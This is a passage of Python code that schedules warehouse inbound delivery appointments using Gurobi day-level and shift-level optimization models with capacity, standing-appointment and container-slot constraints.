#sch_slot[(j,k)] = 0\r\n else:\r\n sch_slot[(j,k)] = 0\r\n \r\n for j in ref.keys():\r\n if j in sch_vas:\r\n pass\r\n #sch_vas[j] = 0\r\n else:\r\n sch_vas[j] = 0\r\n \r\n for j in sch_vas.keys():\r\n for k in range(1,3):\r\n if (j,str(k)) in sch_vas_sh:\r\n pass\r\n #sch_sh[(j,str(k))] = [0,0,0]\r\n else:\r\n sch_vas_sh[(j,str(k))] = 0\r\n \r\n for j in ref.keys():\r\n for k in day_slots[date_fl[j]]:\r\n if (j,k) in sch_vas_fl:\r\n pass\r\n #sch_vas_fl[(j,k)] = '0'\r\n else:\r\n sch_vas_fl[(j,k)] = '0'\r\n for k in night_slots[date_fl[j]]:\r\n if (j,k) in sch_vas_fl:\r\n pass\r\n #sch_vas_fl[(j,k)] = '0'\r\n else:\r\n sch_vas_fl[(j,k)] = '0'\r\n \r\n for j in ref.keys():\r\n if j in cont_appt:\r\n pass\r\n else:\r\n cont_appt[j] = 4\r\n for (i,j) in sch_sh.keys():\r\n if j == '1':\r\n slot_count[(i,j)] = len(day_slots[date_fl[i]])*2 + 4 \r\n elif j == '2' and date_fl[i] == '0':\r\n slot_count[(i,j)] = len(night_slots[date_fl[i]])*2 + 4\r\n else:\r\n slot_count[(i,j)] = 0\r\n for j in cont_appt.keys():\r\n if cont_appt[j] < 0:\r\n cont_appt[j] = 0\r\n else:\r\n pass\r\n logger.info(\"Initializing Container appointment slots\") \r\n for j in cont_appt.keys():\r\n if cont_appt[j] == 0:\r\n sch_slot[(j,'05:00:00','c')] = 1\r\n sch_slot[(j,'08:00:00','c')] = 1\r\n sch_slot[(j,'15:00:00','c')] = 1\r\n sch_slot[(j,'19:00:00','c')] = 1\r\n elif cont_appt[j] == 1:\r\n sch_slot[(j,'05:00:00','c')] = 1\r\n sch_slot[(j,'08:00:00','c')] = 1\r\n sch_slot[(j,'15:00:00','c')] = 1\r\n sch_slot[(j,'19:00:00','c')] = 0\r\n if (j,'19:00:00') in sch_slot:\r\n sch_slot[(j,'19:00:00')] = sch_slot[(j,'19:00:00')] + 1\r\n else:\r\n sch_slot[(j,'19:00:00')] = 1\r\n elif cont_appt[j] == 2:\r\n sch_slot[(j,'05:00:00','c')] = 1\r\n sch_slot[(j,'08:00:00','c')] = 0\r\n sch_slot[(j,'15:00:00','c')] = 1\r\n sch_slot[(j,'19:00:00','c')] = 0\r\n if (j,'19:00:00') in sch_slot:\r\n sch_slot[(j,'19:00:00')] = sch_slot[(j,'19:00:00')] + 1\r\n else:\r\n sch_slot[(j,'19:00:00')] = 1\r\n if (j,'08:00:00') in sch_slot:\r\n sch_slot[(j,'08:00:00')] = sch_slot[(j,'08:00:00')] + 1\r\n else:\r\n sch_slot[(j,'08:00:00')] = 1\r\n elif cont_appt[j] == 3:\r\n sch_slot[(j,'05:00:00','c')] = 1\r\n sch_slot[(j,'08:00:00','c')] = 0\r\n sch_slot[(j,'15:00:00','c')] = 0\r\n sch_slot[(j,'19:00:00','c')] = 0\r\n if (j,'19:00:00') in sch_slot:\r\n sch_slot[(j,'19:00:00')] = sch_slot[(j,'19:00:00')] + 1\r\n else:\r\n sch_slot[(j,'19:00:00')] = 1\r\n if (j,'08:00:00') in sch_slot:\r\n sch_slot[(j,'08:00:00')] = sch_slot[(j,'08:00:00')] + 1\r\n else:\r\n sch_slot[(j,'08:00:00')] = 1\r\n else:\r\n sch_slot[(j,'05:00:00','c')] = 0\r\n sch_slot[(j,'08:00:00','c')] = 0\r\n sch_slot[(j,'15:00:00','c')] = 0\r\n sch_slot[(j,'19:00:00','c')] = 0\r\n if (j,'19:00:00') in sch_slot:\r\n sch_slot[(j,'19:00:00')] = sch_slot[(j,'19:00:00')] + 1\r\n else:\r\n sch_slot[(j,'19:00:00')] = 1\r\n if (j,'08:00:00') in sch_slot:\r\n sch_slot[(j,'08:00:00')] = sch_slot[(j,'08:00:00')] + 1\r\n else:\r\n sch_slot[(j,'08:00:00')] = 1\r\n \r\n for j in units_sku_obj.keys():\r\n if j in dt.keys():\r\n for k in range(1,len(dt[j])+1):\r\n if j in objec:\r\n objec[j].append(abs(units_sku_obj[j][2])+k-1)\r\n else:\r\n objec[j] = [abs(units_sku_obj[j][2])+k-1]\r\n \r\n logger.info(\"Starting to schedule standing appointments\") \r\n for j in sch_dict.keys():\r\n units[j] = sch_dict[j][0]\r\n slot[j] = sch_dict[j][2]\r\n \r\n #calculating expected units\r\n for (i,j,k) in stnd_fl.keys():\r\n if stnd_fl[(i,j,k)] == '0':\r\n if j in day_slots[date_fl[i]]:\r\n if(k,'1') in v_units:\r\n if (i,'1') in exp_units:\r\n exp_units[(i,'1')] = exp_units[(i,'1')] + v_units[(k,'1')][0]\r\n print(exp_units[(i,'1')])\r\n else:\r\n exp_units[(i,'1')] = v_units[(k,'1')][0]\r\n print(exp_units[(i,'1')])\r\n else:\r\n pass\r\n else:\r\n if(k,'2') in v_units:\r\n if (i,'2') in exp_units:\r\n exp_units[(i,'2')] = exp_units[(i,'2')] + v_units[(k,'2')][0]\r\n else:\r\n exp_units[(i,'2')] = v_units[(k,'2')][0]\r\n else:\r\n pass\r\n \r\n else:\r\n pass \r\n #required data structures for building model\r\n \r\n for i in ref.keys():\r\n for j in range(1,3):\r\n if (i,str(j)) in exp_units:\r\n pass\r\n else:\r\n exp_units[(i,str(j))] = 0\r\n \r\n std_ref = {}\r\n std_sh = {}\r\n stnd_ref = []\r\n stnd_ref2 = []\r\n stnd_ref3 = []\r\n logger.info(\"Starting to schedule standing appointments\")\r\n for j in dt.keys():\r\n p = 0\r\n if vendor[j] in stnd_date.keys():\r\n for k in dt[j]:\r\n if k in stnd_date[vendor[j]]:\r\n cnt = 1\r\n for l in stnd_time[vendor[j]]:\r\n if (k,l,vendor[j]) in stnd_fl.keys():\r\n cnt = cnt+1\r\n if stnd_fl[(k,l,vendor[j])] == '0' and p == 0 and slot[k] < (slot_count[(k,'1')] + slot_count[(k,'2')]) and units[k] < 1.05 * (f[k][0]+f[k][1]):\r\n if l in ['06:30:00','08:00:00','09:00:00','10:00:00'] and sch_sh[(k,'1')][2] < slot_count[(k,'1')] and date_fl[k] == '0' and (vendor[j],'1') in v_units: \r\n if (k,l) in out_3:\r\n out_3[(k,l)].append(j)\r\n else:\r\n out_3[(k,l)] = [j]\r\n stnd_fl[(k,l,vendor[j])] = '1'\r\n p = 1\r\n exp_units[(k,'1')] = exp_units[(k,'1')] - v_units[(vendor[j],'1')][0]\r\n elif l in ['16:00:00','16:30:00','17:00:00','21:45:00','22:45:00'] and sch_sh[(k,'2')][2] < slot_count[(k,'2')] and date_fl[k] == '0' and (vendor[j],'2') in v_units:\r\n if (k,l) in out_3:\r\n out_3[(k,l)].append(j)\r\n else:\r\n out_3[(k,l)] = [j]\r\n stnd_fl[(k,l,vendor[j])] = '1'\r\n p = 1\r\n exp_units[(k,'2')] = exp_units[(k,'2')] - v_units[(vendor[j],'2')][0]\r\n elif l in ['06:30:00','07:30:00','09:00:00','10:00:00','16:30:00','21:45:00','22:45:00'] and sch_sh[(k,'1')][2] < slot_count[(k,'1')] and date_fl[k] == '1' and (vendor[j],'1') in v_units:\r\n if (k,l) in out_3:\r\n out_3[(k,l)].append(j)\r\n else:\r\n out_3[(k,l)] = [j]\r\n stnd_fl[(k,l,vendor[j])] = '1'\r\n p = 1\r\n exp_units[(k,'1')] = exp_units[(k,'1')] - v_units[(vendor[j],'1')][0]\r\n else:\r\n pass\r\n if p == 1:\r\n stnd_ref.append(j)\r\n slot[k] = slot[k]+1\r\n units[k] = units[k] + units_sku_obj[j][0]\r\n if (k,l) in sch_slot:\r\n sch_slot[(k,l)] = sch_slot[(k,l)] + 1\r\n else:\r\n sch_slot[(k,l)] = 1\r\n if k in std_ref:\r\n std_ref[k].append(j)\r\n else:\r\n std_ref[k] = [j]\r\n if l in day_slots[date_fl[k]]:\r\n if (k,1) in std_sh:\r\n std_sh[(k,1)].append(j)\r\n else:\r\n std_sh[(k,1)] = [j]\r\n else:\r\n if (k,2) in std_sh:\r\n std_sh[(k,2)].append(j)\r\n else:\r\n std_sh[(k,2)] = [j]\r\n if (k,l,'B000046') in stnd_fl.keys():\r\n if stnd_fl[(k,l,'B000046')] == '1':\r\n sch_vas_fl[(k,l)] = '1'\r\n gh = 0\r\n for d in sorted(day_slots[date_fl[k]]):\r\n if d == l and gh != 0 and gh != len(day_slots[date_fl[k]])-1:\r\n w = gh-1\r\n if w < len(day_slots[date_fl[k]]):\r\n sch_vas_fl[(k,day_slots[date_fl[k]][w])] = '2'\r\n w = gh+1\r\n if w < len(day_slots[date_fl[k]]):\r\n sch_vas_fl[(k,day_slots[date_fl[k]][w])] = '2'\r\n gh = gh+1\r\n \r\n gh = 0\r\n for d in sorted(night_slots[date_fl[k]]):\r\n if d == l and gh != 0 and gh != len(night_slots[date_fl[k]])-1:\r\n w = gh-1\r\n if w < len(night_slots[date_fl[k]]):\r\n sch_vas_fl[(k,night_slots[date_fl[k]][w])] = '2'\r\n w = gh+1\r\n if w < len(night_slots[date_fl[k]]):\r\n sch_vas_fl[(k,night_slots[date_fl[k]][w])] = '2'\r\n gh = gh+1 \r\n else:\r\n if p == 0 and slot[k] + 1 < (slot_count[(k,'1')] + slot_count[(k,'2')]) -5 and units[k] + exp_units[(k,'1')] + exp_units[(k,'2')] + units_sku_obj[j][0] < 1.05 * (f[k][0]+f[k][1]) and cnt > len(stnd_time[vendor[j]]):\r\n if k in std_ref:\r\n std_ref[k].append(j)\r\n else:\r\n std_ref[k] = [j]\r\n p = 1\r\n slot[k] = slot[k] + 1\r\n units[k] = units[k] + units_sku_obj[j][0]\r\n stnd_ref3.append(j)\r\n else:\r\n pass\r\n else:\r\n pass\r\n else:\r\n pass\r\n for i,j in out_3.keys():\r\n for k in out_3[(i,j)]:\r\n if b[k] == '1':\r\n temp_bulk[(i,j)] = '1'\r\n for i in sch_dict.keys():\r\n if date_fl[i] == '0':\r\n if (sch_dict[i][0] < 1.05 * (f[i][0]+f[i][1])) and (sch_sh[(i,'1')][2] >= len(day_slots[date_fl[i]])*2 or sch_sh[(i,'2')][2] >= len(night_slots[date_fl[i]])*2):\r\n slot_count[(i,'1')] = len(day_slots[date_fl[i]])*3 \r\n slot_count[(i,'2')] = len(night_slots[date_fl[i]])*3 \r\n else:\r\n pass\r\n else:\r\n if (sch_dict[i][0] < 1.05 * f[i]) and (sch_sh[(i,'1')][2] >= len(day_slots[date_fl[i]])*2):\r\n slot_count[(i,'1')] = len(day_slots[date_fl[i]])*3 \r\n else:\r\n pass\r\n logger.info(\"Standing Appointment Scheduled\")\r\n #adding exsisting standing appointment slots\r\n for (i,j,k) in stnd_fl.keys():\r\n if stnd_fl[(i,j,k)] == '0':\r\n if (i,j) in sch_slot:\r\n sch_slot[(i,j)] = sch_slot[(i,j)]+1\r\n if i in sch_dict:\r\n sch_dict[i][2] = sch_dict[i][2] + 1\r\n else:\r\n sch_dict[i] = [0,0,0]\r\n sch_dict[i][2] = 1\r\n if j in day_slots[date_fl[i]]:\r\n if (i,'1') in sch_sh:\r\n sch_sh[(i,'1')][2] = sch_sh[(i,'1')][2] + 1\r\n else:\r\n sch_sh[(i,'1')] = [0,0,0]\r\n sch_sh[(i,'1')][2] = 1\r\n else:\r\n if (i,'2') in sch_sh:\r\n sch_sh[(i,'2')][2] = sch_sh[(i,'2')][2] + 1\r\n else:\r\n sch_sh[(i,'2')] = [0,0,0]\r\n sch_sh[(i,'2')][2] = 1\r\n else:\r\n sch_slot[(i,j)] = 1\r\n if i in sch_dict:\r\n sch_dict[i][2] = sch_dict[i][2] + 1\r\n else:\r\n sch_dict[i] = [0,0,0]\r\n sch_dict[i][2] = 1\r\n if j in day_slots[date_fl[i]]:\r\n if (i,'1') in sch_sh:\r\n sch_sh[(i,'1')][2] = sch_sh[(i,'1')][2] + 1\r\n else:\r\n sch_sh[(i,'1')] = [0,0,0]\r\n sch_sh[(i,'1')][2] = 1\r\n else:\r\n if (i,'2') in sch_sh:\r\n sch_sh[(i,'2')][2] = sch_sh[(i,'2')][2] + 1\r\n else:\r\n sch_sh[(i,'2')] = [0,0,0]\r\n sch_sh[(i,'2')][2] = 1\r\n #calculating expected units\r\n for (i,j,k) in stnd_fl.keys():\r\n if stnd_fl[(i,j,k)] == '0':\r\n if j in day_slots[date_fl[i]]:\r\n if(k,'1') in v_units:\r\n if (i,'1') in exp_units:\r\n exp_units[(i,'1')] = exp_units[(i,'1')] + v_units[(k,'1')][0]\r\n print(exp_units[(i,'1')])\r\n else:\r\n exp_units[(i,'1')] = v_units[(k,'1')][0]\r\n print(exp_units[(i,'1')])\r\n else:\r\n pass\r\n else:\r\n if(k,'2') in v_units:\r\n if (i,'2') in exp_units:\r\n exp_units[(i,'2')] = exp_units[(i,'2')] + v_units[(k,'2')][0]\r\n else:\r\n exp_units[(i,'2')] = v_units[(k,'2')][0]\r\n else:\r\n pass\r\n \r\n else:\r\n pass\r\n for (i,j) in sch_sh.keys():\r\n if (i,j) in exp_units:\r\n pass\r\n else:\r\n exp_units[(i,j)] = 0 \r\n \r\n bulk_break = {}\r\n for i in sch_dict.keys():\r\n gh = 0\r\n for j in day_slots[date_fl[i]]:\r\n if (i,j) in temp_bulk.keys():\r\n bulk_break[(i,j)] = '1'\r\n if temp_bulk[(i,j)] == '1' and gh != 0 and gh != len(day_slots[date_fl[i]])-1:\r\n w = gh-1\r\n if w < len(day_slots[date_fl[i]]):\r\n bulk_break[(i,day_slots[date_fl[i]][w])] = '2'\r\n w = gh+1\r\n if w < len(day_slots[date_fl[i]]):\r\n bulk_break[(i,day_slots[date_fl[i]][w])] = '2'\r\n elif temp_bulk[(i,j)] == '1' and gh == 0:\r\n w = gh+1\r\n bulk_break[(i,day_slots[date_fl[i]][w])] = '2'\r\n elif temp_bulk[(i,j)] == '1' and gh == len(day_slots[date_fl[i]])-1:\r\n w = gh-1\r\n bulk_break[(i,day_slots[date_fl[i]][w])] = '2'\r\n else:\r\n pass\r\n else:\r\n bulk_break[(i,j)] = '0'\r\n gh = gh+1\r\n gh = 0\r\n for j in night_slots[date_fl[i]]:\r\n if (i,j) in temp_bulk.keys():\r\n bulk_break[(i,j)] = '1'\r\n if temp_bulk[(i,j)] == '1' and gh != 0 and gh != len(night_slots[date_fl[i]])-1:\r\n w = gh-1\r\n if w < len(night_slots[date_fl[i]]):\r\n bulk_break[(i,night_slots[date_fl[i]][w])] = '2'\r\n w = gh+1\r\n if w < len(night_slots[date_fl[i]]):\r\n bulk_break[(i,night_slots[date_fl[i]][w])] = '2'\r\n elif temp_bulk[(i,j)] == '1' and gh == 0:\r\n w = gh+1\r\n bulk_break[(i,night_slots[date_fl[i]][w])] = '2'\r\n elif temp_bulk[(i,j)] == '1' and gh == len(night_slots[date_fl[i]])-1:\r\n w = gh-1\r\n bulk_break[(i,night_slots[date_fl[i]][w])] = '2'\r\n else:\r\n pass\r\n else:\r\n bulk_break[(i,j)] = '0'\r\n gh = gh+1\r\n for (i,j) in slot_count.keys():\r\n if sch_sh[(i,j)][2] >= slot_count[(i,j)]:\r\n slot_count[(i,j)] = sch_sh[(i,j)][2] \r\n else:\r\n pass\r\n logger.info(\"Building LP Model at Day level\")\r\n # Solver Part I\r\n #Intializing day model\r\n while True:\r\n m1 = Model()\r\n #variable declaration\r\n x = {}\r\n slack = {}\r\n for j in dt.keys():\r\n if j not in infeas_ref and j not in stnd_ref2:\r\n for k in dt[j]:\r\n x[j,k] = m1.addVar(lb=0,ub=1,vtype=GRB.BINARY,name='x[%s;%s]' %(j,k))\r\n m1.update()\r\n for j in ref.keys():\r\n slack[j] = m1.addVar(lb=0,ub=GRB.INFINITY,vtype=GRB.INTEGER,name='slack[%s]'%(j))\r\n U = m1.addVar(lb=0,ub=GRB.INFINITY,vtype=GRB.CONTINUOUS,name ='U')\r\n S = m1.addVar(lb=0,ub=GRB.INFINITY,vtype=GRB.CONTINUOUS,name='S')\r\n #objective function declaration\r\n o ={}\r\n for j in objec.keys():\r\n if j not in infeas_ref and j not in stnd_ref2:\r\n o[j] = quicksum(objec[j][k-1]*x[j,dt[j][k-1]] for k in range(1,len(objec[j])+1))\r\n \r\n m1.setObjectiveN(quicksum(o[j] for j in o.keys()),index = 0,priority = 3, name ='ORDD')\r\n m1.setObjectiveN(U,index = 1,priority = 1, name = 'unit_dist')\r\n m1.setObjectiveN(S,index = 2,priority = 1, name = 'UPT')\r\n m1.setObjectiveN(quicksum(100000000*slack[j] for j in slack.keys()),index = 4,priority = 3, name ='Slack Variable')\r\n #decalaring model sense\r\n m1.modelSense = GRB.MINIMIZE\r\n #adding constraints\r\n m1.update()\r\n cap = {}\r\n unit ={}\r\n sku = {}\r\n break_appt ={}\r\n day_assign = {}\r\n appt_assign = {}\r\n stand_appt = {}\r\n con_appt = {}\r\n temp_out1 = {}\r\n slack_cons = {}\r\n vas_cons = {}\r\n vas_appt_assign = {}\r\n for j in ref.keys():\r\n #capcity constraint\r\n cap[j] = m1.addConstr(quicksum(units_sku_obj[k][0]*x[k,j] for k in ref[j] if k not in infeas_ref and k not in stnd_ref2)-slack[j],GRB.LESS_EQUAL,(1.05*(f[j][0]+f[j][1]))-sch_dict[j][0]-exp_units[j,'1']-exp_units[j,'2'], name ='cap[%s]' %(j))\r\n #cap[j] = m1.addConstr(quicksum(units_sku_obj[k][0]*x[k,j] for k in ref[j] if k not in infeas_ref and k not in stnd_ref2),GRB.LESS_EQUAL,(1.05*f[j])-sch_dict[j][0]-exp_units[j,'1']-exp_units[j,'2'], name ='cap[%s]' %(j))\r\n #unit distribution constraint\r\n unit[j,1] = m1.addConstr(U,GRB.GREATER_EQUAL,(exp_units[j,'1']+exp_units[j,'2']+sch_dict[j][0]+quicksum(units_sku_obj[k][0]*x[k,j] for k in ref[j] if k not in infeas_ref and k not in stnd_ref2)-f[j][0]-f[j][1]),name = 'unit[%s;%d]' %(j,1))\r\n unit[j,2] = m1.addConstr(U,GRB.GREATER_EQUAL,(-exp_units[j,'1']-exp_units[j,'2']-sch_dict[j][0]-quicksum(units_sku_obj[k][0]*x[k,j] for k in ref[j] if k not in infeas_ref and k not in stnd_ref2)+f[j][0]+f[j][1]),name = 'unit[%s;%d]' %(j,2))\r\n #sku distribution constraint\r\n sku[j] = m1.addConstr(S,GRB.GREATER_EQUAL,sch_dict[j][1]+quicksum(units_sku_obj[k][1]*x[k,j] for k in ref[j] if k not in infeas_ref and k not in stnd_ref2), name = 'sku[%s]'%(j))\r\n #vas constraint\r\n vas_cons[j] = m1.addConstr(quicksum(vas_units[k] * x[k,j] for k in ref[j] if k not in infeas_ref and k not in stnd_ref),GRB.LESS_EQUAL,8000 - sch_vas[j],name='vas_day[%s]'%(j))\r\n #day assignment constraint\r\n day_assign[j] = m1.addConstr(quicksum(x[k,j] for k in ref[j] if k not in infeas_ref and k not in stnd_ref2), GRB.LESS_EQUAL,(slot_count[(j,'1')]+slot_count[(j,'2')])- sch_dict[j][2], name='day_assign[%s]' %(j))\r\n #container appointment constraints\r\n con_appt[j] = m1.addConstr(quicksum(x[k,j] for k in ref[j] if cnt_fl[k]=='3.0' and k not in infeas_ref and date_fl[j] == '0'),GRB.LESS_EQUAL,cont_appt[j],name='con_appt[%s]' %(j))\r\n m1.update()\r\n for j in dt.keys():\r\n if j not in infeas_ref and j not in stnd_ref2:\r\n appt_assign[j] = m1.addConstr(quicksum(x[j,k] for k in dt[j]), GRB.EQUAL,1, name = 'appt_assign[%s]'%(j))\r\n m1.update()\r\n for j in dt.keys():\r\n if j not in infeas_ref and j not in stnd_ref2 and vas_flag[j] == '1' and j not in std_ref:\r\n vas_appt_assign[j] = m1.addConstr(quicksum(x[j,k] for k in dt[j] if k not in vas_dt),GRB.EQUAL,1)\r\n m1.update()\r\n #standing_appointment_constraint\r\n for j in std_ref.keys():\r\n for k in std_ref[j]:\r\n stand_appt[(j,k)] = m1.addConstr(x[k,j],GRB.EQUAL,1,name='stand_appt[%s;%s]'%(j,k))\r\n m1.Params.timeLimit = 600 #declaring timelimit for running model\r\n m1.write('day_model.lp') #writing the day model\r\n m1.optimize()#Optimizing the day model\r\n #printing Solver Part I Solution\r\n if m1.status == GRB.OPTIMAL or m1.status == GRB.TIME_LIMIT:\r\n for j,k in x.keys():\r\n if x[j,k].x > 0:\r\n if k in out_1:\r\n out_1[k].append(j)\r\n else:\r\n out_1[k]= [j]\r\n break\r\n else:\r\n print(\"The day model became infeasible\")\r\n logging.info(\"The day model became infeasible\")\r\n m1.computeIIS()#computing infeasibility\r\n m1.write('day_model_DFW.ilp')#writing causes of infeasibility\r\n m1.write('day_model_failed.lp')\r\n M1 = M1+1\r\n if len(infeas_ref) + len(stnd_ref) < len(dt.keys()):\r\n a = max(units_sku_obj[j][0] for j in units_sku_obj.keys() if j not in stnd_ref and j not in infeas_ref)\r\n for j in units_sku_obj.keys():\r\n if units_sku_obj[j][0] == a:\r\n infeas_ref.append(j)\r\n else:\r\n pass\r\n else:\r\n break\r\n if m1.status == GRB.OPTIMAL or m1.status == GRB.TIME_LIMIT: \r\n for j in infeas_ref:\r\n for k in ref_num[j]:\r\n infeasible_day[(j,k)] = [str(TODAY),'DFW1','None',str(j),str(k),dt[j][0],cr_dt[j],'NOT_OPTIMAL']\r\n else:\r\n for j in dt.keys():\r\n for k in ref_num[j]:\r\n infeasible_day[(j,k)] = [str(TODAY),'DFW1','None',str(j),str(k),dt[j][0],cr_dt[j],'NOT_OPTIMAL']\r\n df_day = pd.DataFrame(data = infeasible_day.values())\r\n logger.info(\"Solved LP Model at Day level\")\r\n #Solver Part II\r\n #Initializing Shift Model\r\n logger.info(\"Building LP Model at Shift level\")\r\n for j in out_1.keys():\r\n if date_fl[j] == '0':\r\n m2 = Model()\r\n #variable declaration and objective function declaration\r\n y = {}\r\n for k in out_1[j]:\r\n y[j,k,1] = m2.addVar(lb=0,ub=1,vtype=GRB.BINARY, name= 'y[%s;%s;%d]'%(j,k,1))\r\n y[j,k,2] = m2.addVar(lb=0,ub=1,vtype=GRB.BINARY,name='y[%s;%s;%d]'%(j,k,2))\r\n m2.update()\r\n #declaring model Sense\r\n US = m2.addVar(lb=0,ub=GRB.INFINITY,vtype=GRB.CONTINUOUS,name ='US')\r\n SS = m2.addVar(lb=0,ub=GRB.INFINITY,vtype=GRB.CONTINUOUS,name ='SS')\r\n m2.setObjectiveN(US,index=0,priority=1,name='unit_dist')\r\n m2.setObjectiveN(SS,index=1,priority=1,name='UPT')\r\n m2.modelSense = GRB.MINIMIZE\r\n #adding constraint\r\n shift_limit = {}\r\n shift_dist = {}\r\n shift_assign = {}\r\n shift_stand = {}\r\n unit_shift = {}\r\n sku_shift = {}\r\n day1 = {}\r\n night1 = {}\r\n day2 = {} \r\n night2 ={}\r\n vas_shift_cons = {}\r\n vas_shift_appt = {}\r\n #day_shift Slot limitation\r\n shift_limit[j,1] = m2.addConstr(quicksum(y[j,k,1] for k in out_1[j]),GRB.LESS_EQUAL,slot_count[(j,'1')]-sch_sh[(j,'1')][2],name='shift_limit[%s;%d]'%(j,1))\r\n #night shift limitation\r\n shift_limit[j,2] = m2.addConstr(quicksum(y[j,k,2] for k in out_1[j]), GRB.LESS_EQUAL,slot_count[(j,'2')]-sch_sh[(j,'2')][2],name='shift_limit[%s;%d]'%(j,2))\r\n #vas limitation day shift\r\n if sch_vas_sh[j,'1'] <= 4000:\r\n vas_shift_cons[j,1] = m2.addConstr(quicksum(vas_units[k] * y[j,k,1] for k in out_1[j] if k not in stnd_ref),GRB.LESS_EQUAL,4000-sch_vas_sh[j,'1'],name= 'vas_shift_cons[%s;%d]' %(j,1))\r\n #vas limitation night shift\r\n if sch_vas_sh[j,'2'] <= 4000:\r\n vas_shift_cons[j,2] = m2.addConstr(quicksum(vas_units[k] * y[j,k,2] for k in out_1[j] if k not in stnd_ref),GRB.LESS_EQUAL,4000-sch_vas_sh[j,'2'],name= 'vas_shift_cons[%s;%d]' %(j,2))\r\n #data structures for model\r\n day1[(j,1)] = quicksum(units_sku_obj[k][0] * y[j,k,1] for k in out_1[j])\r\n night1[(j,1)] = quicksum(units_sku_obj[k][0] * y[j,k,2] for k in out_1[j])\r\n day2[(j,2)] = quicksum(units_sku_obj[k][1] * y[j,k,1] for k in out_1[j])\r\n night2[(j,2)] = quicksum(units_sku_obj[k][1] * y[j,k,2] for k in out_1[j])\r\n \r\n m2.update()\r\n #slot assignment constraint \r\n for k in out_1[j]:\r\n shift_assign[j,k] = m2.addConstr(quicksum(y[j,k,l] for l in range(1,3)),GRB.EQUAL,1,name='shift_assign[%s;%s]'%(j,k))\r\n m2.update()\r\n for k in out_1[j]:\r\n if vas_flag[k] == '1' and k not in std_ref:\r\n vas_shift_appt[j,k]= m2.addConstr(quicksum(y[j,k,l] for l in range(1,3) if (j,str(l)) not in vas_dt),GRB.EQUAL,1)\r\n #Shift Standing appointments\r\n for (k,l) in std_sh.keys():\r\n if k == j:\r\n for m in std_sh[(k,l)]:\r\n shift_stand[(k,l)] = m2.addConstr(y[k,m,l],GRB.EQUAL,1,name = 'shift_stand[%s;%s]'%(k,m))\r\n \r\n \r\n \r\n #container Standing appointments\r\n pw=0\r\n for k in out_1[j]:\r\n if cnt_fl[k]== '3.0':\r\n if pw == 0 and cont_appt[j] == 0:\r\n shift_stand[j,k] = m2.addConstr(y[j,k,1],GRB.EQUAL,1,name = 'shift_stand[%s;%s]'%(j,k))\r\n pw = pw+1\r\n else:\r\n shift_stand[j,k] = m2.addConstr(y[j,k,2],GRB.EQUAL,1,name = 'shift_stand[%s;%s]'%(j,k))\r\n \r\n #day shift unit limitation\r\n unit_shift[j,1]= m2.addConstr(US,GRB.GREATER_EQUAL,f[j][0]-sch_sh[(j,'1')][0]-day1[(j,1)]-exp_units[(j,'1')],name='unit_shift[%s;%d]'%(j,1))\r\n unit_shift[j,3]= m2.addConstr(US,GRB.GREATER_EQUAL,sch_sh[(j,'1')][0]+day1[(j,1)]+exp_units[(j,'1')]-f[j][0],name='unit_shift[%s;%d]'%(j,3))\r\n #night shift unit limitation\r\n unit_shift[j,2]= m2.addConstr(US,GRB.GREATER_EQUAL,f[j][1]-sch_sh[(j,'2')][0]-night1[(j,1)]-exp_units[(j,'2')],name='unit_shift[%s;%d]'%(j,2))\r\n unit_shift[j,4]= m2.addConstr(US,GRB.GREATER_EQUAL,sch_sh[(j,'2')][0]+night1[(j,1)]+exp_units[(j,'2')]-f[j][1],name='unit_shift[%s;%d]'%(j,4))\r\n #day shift SKU limitation\r\n sku_shift[j,1]= m2.addConstr(SS,GRB.GREATER_EQUAL,sch_sh[(j,'1')][1]+day2[(j,2)],name='sku_shift[%s;%d]'%(j,1))\r\n #night shift SKU limitation\r\n sku_shift[j,2]= m2.addConstr(SS,GRB.GREATER_EQUAL,sch_sh[(j,'2')][1]+night2[(j,2)],name='sku_shift[%s;%d]'%(j,2))\r\n m2.update\r\n m2.Params.timeLimit = 600 #declaring timelimit for running model\r\n m2.write('shift_model.lp')#writing shift model\r\n m2.optimize()#Optimizing shift model\r\n #Printing Solver Part II solutions\r\n if m2.status == GRB.OPTIMAL or m2.status == GRB.TIME_LIMIT:\r\n for j,k,l in y.keys():\r\n if y[j,k,l].x > 0:\r\n if (j,l) in out_2:\r\n out_2[(j,l)].append(k)\r\n else:\r\n out_2[(j,l)] = [k]\r\n \r\n else:\r\n print(\"The shift model became infeasible\")\r\n logging.info(\"The shift model became infeasible\")\r\n m2.computeIIS()#computing infeasibility\r\n m2.write('shift_model_DFW.ilp')#writing causes of infeasibility\r\n m2.write('shift_model_failed.lp')\r\n m2.write('day_model_failed.lp')\r\n M2 = M2 +1 \r\n std = out_1[j]\r\n for k in std:\r\n for l in ref_num[k]:\r\n infeas_shift[(k,l)] = [str(TODAY),'DFW1','None',str(k),str(l),dt[k][0],cr_dt[k],'NOT_OPTIMAL']\r\n else:\r\n for k in out_1[j]:\r\n if (j,1) in out_2:\r\n out_2[(j,1)].append(k)\r\n else:\r\n out_2[(j,1)] = [k]\r\n df_sh = pd.DataFrame(data = infeas_shift.values())\r\n logger.info(\"Solved LP Model at Shift level\")\r\n #scheduling time slots\r\n #standing_appointment_slots\r\n out_copy = out_2.copy() \r\n st_slot = []\r\n \r\n #container_appointment_slots\r\n #Scheduling time slots\r\n logger.info(\"Scheduling time slots\")\r\n M3 = 1\r\n for (k,j) in out_2.keys():\r\n while len(out_2[(k,j)]) > 0:\r\n a = out_2[(k,j)].pop(0)\r\n if a not in stnd_ref:\r\n p = 0\r\n if cnt_fl[a] == '3.0': #container appointments\r\n if sch_slot[(k,'05:00:00','c')] < 1:\r\n if p == 0:\r\n if (k,'05:00:00') in out_3:\r\n out_3[(k,'05:00:00')].append(a)\r\n p = 1\r\n sch_slot[(k,'05:00:00','c')] = sch_slot[(k,'05:00:00','c')] + 1\r\n bulk_break[(k,'05:00:00')] = '1'\r\n bulk_break[(k,'05:30:00')] = '2'\r\n else:\r\n out_3[k,'05:00:00'] = [a]\r\n p = 1\r\n sch_slot[(k,'05:00:00','c')] = sch_slot[(k,'05:00:00','c')] + 1\r\n bulk_break[(k,'05:00:00')] = '1'\r\n bulk_break[(k,'05:30:00')] = '2'\r\n elif sch_slot[(k,'15:00:00','c')] < 1:\r\n if p == 0:\r\n if (k,'15:00:00') in out_3:\r\n out_3[(k,'15:00:00')].append(a)\r\n p = 1\r\n sch_slot[(k,'15:00:00','c')] = sch_slot[(k,'15:00:00','c')] + 1\r\n bulk_break[(k,'15:00:00')] = '1'\r\n else:\r\n out_3[k,'15:00:00'] = [a]\r\n p = 1\r\n sch_slot[(k,'15:00:00','c')] = sch_slot[(k,'15:00:00','c')] + 1\r\n 